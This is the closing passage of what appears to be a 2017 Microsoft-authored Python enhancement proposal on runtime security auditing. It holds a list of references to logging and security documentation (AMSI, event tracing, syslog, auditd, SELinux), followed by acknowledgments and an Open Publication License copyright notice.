.. [3] `<https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html>`_
|
||
|
||
.. [4] `<https://aka.ms/deviceguard>`_
|
||
|
||
.. [5] AMSI, `<https://msdn.microsoft.com/en-us/library/windows/desktop/dn889587(v=vs.85).aspx>`_
|
||
|
||
.. [6] Persistent Zone Identifiers, `<https://msdn.microsoft.com/en-us/library/ms537021(v=vs.85).aspx>`_
|
||
|
||
.. [7] Event tracing, `<https://msdn.microsoft.com/en-us/library/aa363668(v=vs.85).aspx>`_
|
||
|
||
.. [8] `<https://www.gnupg.org/>`_
|
||
|
||
.. [9] `<https://www.systutorials.com/docs/linux/man/3-sd_journal_send/>`_
|
||
|
||
.. [10] `<http://www.trustedbsd.org/openbsm.html>`_
|
||
|
||
.. [11] `<https://linux.die.net/man/3/syslog>`_
|
||
|
||
.. [12] `<http://security.blogoverflow.com/2013/01/a-brief-introduction-to-auditd/>`_
|
||
|
||
.. [13] SELinux access decisions `<http://man7.org/linux/man-pages/man3/avc_entry_ref_init.3.html>`_
|
||
|
||
Acknowledgments
|
||
===============
|
||
|
||
Thanks to all the people from Microsoft involved in helping make the
|
||
Python runtime safer for production use, and especially to James Powell
|
||
for doing much of the initial research, analysis and implementation, Lee
|
||
Holmes for invaluable insights into the info-sec field and PowerShell's
|
||
responses, and Brett Cannon for the restraining and grounding
|
||
discussions.
|
||
|
||
Copyright
|
||
=========
|
||
|
||
Copyright (c) 2017 by Microsoft Corporation. This material may be
|
||
distributed only subject to the terms and conditions set forth in the
|
||
Open Publication License, v1.0 or later (the latest version is presently
|
||
available at http://www.opencontent.org/openpub/).
|